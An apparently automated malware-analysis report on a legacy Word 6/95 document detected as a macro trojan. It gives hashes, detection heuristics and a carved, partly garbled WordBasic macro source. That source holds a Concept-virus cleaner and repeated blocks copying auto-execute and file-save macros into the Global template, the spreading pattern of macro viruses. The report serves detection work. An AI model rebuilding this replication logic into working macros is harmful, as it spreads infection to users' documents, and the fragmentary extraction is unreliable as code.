Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6a54b8b71e41be1…

MALICIOUS

Office (OLE)

Size: 12.0 KB
First seen: 2014-02-02
MD5: 7110d27bbc271d07314bfb3ef14bb714
SHA-1: 0fa7e751ef4b6731bfe74c3c3326e2dde387fcec
SHA-256: e6a54b8b71e41be17c73be0565322405dffc08244798f5c42392907572954381
Risk score: 102

Heuristics (3)

  • ClamAV: Win.Trojan.Muck-6 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Muck-6
  • Legacy WordBasic macro-virus markers (high) OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers (such as AutoOpen) together with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source (info) OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 5919 bytes
SHA-256: 23b2113ae001487b67f1117b4b2515aa112d12d7076e75ab73d4c50833e3a719

Preview of the extracted script (first 1,000 lines):
, = =        
    8300     29551 25964
        29793     29551     24933     REM macros from any documents that y       29551 =   @cmd6120    
            24930 ,      
,  
        @cmd2065
*           @cmd5720
21349      
    29793 21349          
        357 =
MAIN
@cmd0143 = "IMI" ,
@cmd8044 1
@cmd0241
, -
IsThereAnIni$ = @cmd810d "Word6" , "StartupScreen" , "InfoMap.ini"
IsThereAnIni$ = @cmd810e "Word6" , "StartupScreen" , "On" , "InfoMap.ini"
Win$ = @cmd810c 21
Win$ = "Windows" Platform$ = "Windows"   Platform$ = "Macintosh"
TitleBox$ = "Version 1.2 for " = Platform$
Copyright$ =   ,     @cmd202c ,     26740 ,       8300 @cmd7468  
,        
@cmd0129 590 , 269 , Titlebox$
@cmd8125 13 , 6 , 567 , 211 , "LOGO" , 1 ,
@cmd80c9 19 , 251 , 550 , 13 , Copyright$ ,
@cmd80c7 416 , 218 , 88 , 21
@cmd80d8 25 , 224 , 236 , 16 , "Disable this startup screen." ,
dlg @cmd0129
dlg
StartupScreen$ = @cmd810d "Word6" , "StartupScreen" , "InfoMap.ini"
StartupScreen$ = "On" x = dlg
Checked = dlg
Checked = 1 @cmd810e "Word6" , "StartupScreen" , "Off" , "InfoMap.ini"
REM  ******************************************************************
REM  Macro   : AutoExit
REM  Created : August 11, 1995
REM  Copyright (c) 1995 Microsoft Corp.
REM  Description : detects and removes Concept Virus from document
REM  being closed
REM  *****************************************************************
quiet , notopened , notsaved , notconverted , cleaned , Mac , quote$ , logfile$ , Found$ , sMe$ , stAutoOpen$ , stFileSaveAs$ , NormalDot$ , stBuiltIn$
Localize
REM **** Insert string translation here ****'
warn$ = "Your Normal (Global) template contained the Concept Virus. ScanProt has cleaned your Normal (Global) template. Saving it now will permanently remove the Concept Virus. Save now ?"
msgTitle$ = "Concept Virus detected!"
stAutoOpen$ = "AutoOpen"
stFileSaveAs$ = "FileSaveAs"
NormalDot$ = "Normal.dot"
stBuiltIn$ = "Built In"
REM **** End String Translation ****'
MAIN
, - * EndFunc
Localize
REM  initialize constants
quiet = 0
notopened = 0
notsaved = 0
notconverted = 0
cleaned = 0
REM  What platform are we on, Mac or Win?
@cmd800f @cmd80b5 1 , "Macintosh" 0
Mac = 1
quote$ =
@cmd800f @cmd80b5 1 , "Windows 3." 0
REM  16-bit Windows
Mac = 0
quote$ =
Mac = 0
quote$ = @cmd8005 34
REM **********************************************************************'
REM *	INSERT YOUR CODE HERE								    *'
REM **********************************************************************'
FixIt 0
FixIt 3
REM found all three concept virus macros, so display msg
@cmd802b warn$ , msgTitle$ , 52 = 1 @cmd80a3 1
REM we probably saw a ghost PayLoad, so just save changes
@cmd80a3 1
=
REM **********************************************************************'
REM *	INSERT YOUR CODE HERE								    *'
REM **********************************************************************' =
Err = 0
FixIt
, - * EndFunc
Foo = 0
Foo = Foo = CleanIt "AAAZFS"
Foo = Foo = CleanIt "AAAZAO"
Foo = Foo = CleanIt "PayLoad"
Foo 0
REM  remove possibly correct macros only if definitely evil ones
REM  detected (above)
REM  Since FileSaveAs is localized in many languages we check 		' for the localized name and for FileSaveAs
Foo = Foo = CleanIt stFileSaveAs$
Foo = Foo = CleanIt "FileSaveAs"
Foo Foo = Foo = CleanIt stAutoOpen$
FixIt = Foo =
Err = 0
CleanIt BadMacro$
, - * EndFunc
NormalDot$ = @cmd80ea @cmd80eb NormalDot$
@cmd80b5 2
"1.0" , "1.1" , "1.1a" , "2.0" , "2.0a" , "2.0b" , "2.0c" , "6.0" , "6.0a" , "6.0c"
@cmd8009 @cmd8045 "Microsoft Word" , "User-Dot-Path" , 1 = "\"
sMe$ = @cmd80af @cmd8045 "Microsoft Word" , "User-Dot-Path" = NormalDot$
sMe$ = @cmd80af @cmd8045 "Microsoft Word" , "User-Dot-Path" = "\" = NormalDot$
"7.0" , "7.0a" , "7.0b" , "7.0c"
REM 7.0x is included only as a precaution for the future just in case there ever is such a version.
TD$ = @cmd810d "HKEY_CURRENT_USER\Software\Microsoft\Microsoft Office\95\FileNew\LocalTemplates" , ,
@cmd8009 TD$ , 1 = "\"
sMe$ = TD$ = NormalDot$
sMe$ = TD$ = "\" = NormalDot$
TD$ = sMe$ = NormalDot$
CleanIt = 0
@cmd818e BadMacro$ @cmd818e BadMacro$ stBuiltIn$
mfn$ = @cmd818e BadMacro$
mfn$ = "Global" mfn$ = sMe$
@cmd00de , = mfn$ , = BadMacro$ , = 3
CleanIt = 1
=
Err = 0
MAIN
, -
@cmd80c2 @cmd8025 = ":AutoOpen" , "Global:AutoOpen" , ExecuteOnly
@cmd80c2 @cmd8025 = ":AutoClose" , "Global:AutoClose" , ExecuteOnly
@cmd80c2 @cmd8025 = ":AutoNew" , "Global:AutoNew" , ExecuteOnly
@cmd80c2 @cmd8025 = ":AutoExit" , "Global:AutoExit" , ExecuteOnly
@cmd80c2 @cmd8025 = ":FileSave" , "Global:FileSave" , ExecuteOnly
@cmd80c2 @cmd8025 = ":FileSaveAs" , "Global:FileSaveAs" , ExecuteOnly
@cmd80c2 "Global:AutoOpen" , @cmd8025 = ":AutoOpen" , ExecuteOnly
@cmd80c2 "Global:AutoClose" , @cmd8025 = ":AutoClose" , ExecuteOnly
@cmd80c2 "Global:AutoNew" , @cmd8025 = ":AutoNew" , ExecuteOnly
@cmd80c2 "Global:AutoExit" , @cmd8025 = ":AutoExit" , ExecuteOnly
@cmd80c2 "Global:FileSave" , @cmd8025 = ":FileSave" , ExecuteOnly
@cmd80c2 "Global:FileSaveAs" , @cmd8025 = ":FileSaveAs" , ExecuteOnly
@cmd80a3 1
MAIN
, -
@cmd0053
@cmd0054 = 1
@cmd80c2 "Global:AutoOpen" , @cmd8025 = ":AutoOpen" , ExecuteOnly
@cmd80c2 "Global:AutoClose" , @cmd8025 = ":AutoClose" , ExecuteOnly
@cmd80c2 "Global:AutoNew" , @cmd8025 = ":AutoNew" , ExecuteOnly
@cmd80c2 "Global:AutoExit" , @cmd8025 = ":AutoExit" , ExecuteOnly
@cmd80c2 "Global:FileSave" , @cmd8025 = ":FileSave" , ExecuteOnly
@cmd80c2 "Global:FileSaveAs" , @cmd8025 = ":FileSaveAs" , ExecuteOnly
MAIN
MAIN
, -
@cmd80c2 "Global:AutoOpen" , @cmd8025 = ":AutoOpen" , ExecuteOnly
@cmd80c2 "Global:AutoClose" , @cmd8025 = ":AutoClose" , ExecuteOnly
@cmd80c2 "Global:AutoNew" , @cmd8025 = ":AutoNew" , ExecuteOnly
@cmd80c2 "Global:AutoExit" , @cmd8025 = ":AutoExit" , ExecuteOnly
@cmd80c2 "Global:FileSave" , @cmd8025 = ":FileSave" , ExecuteOnly
@cmd80c2 "Global:FileSaveAs" , @cmd8025 = ":FileSaveAs" , ExecuteOnly
dlg @cmd0054
dlg
dlg
@cmd0054 dlg
@cmd0054 = 1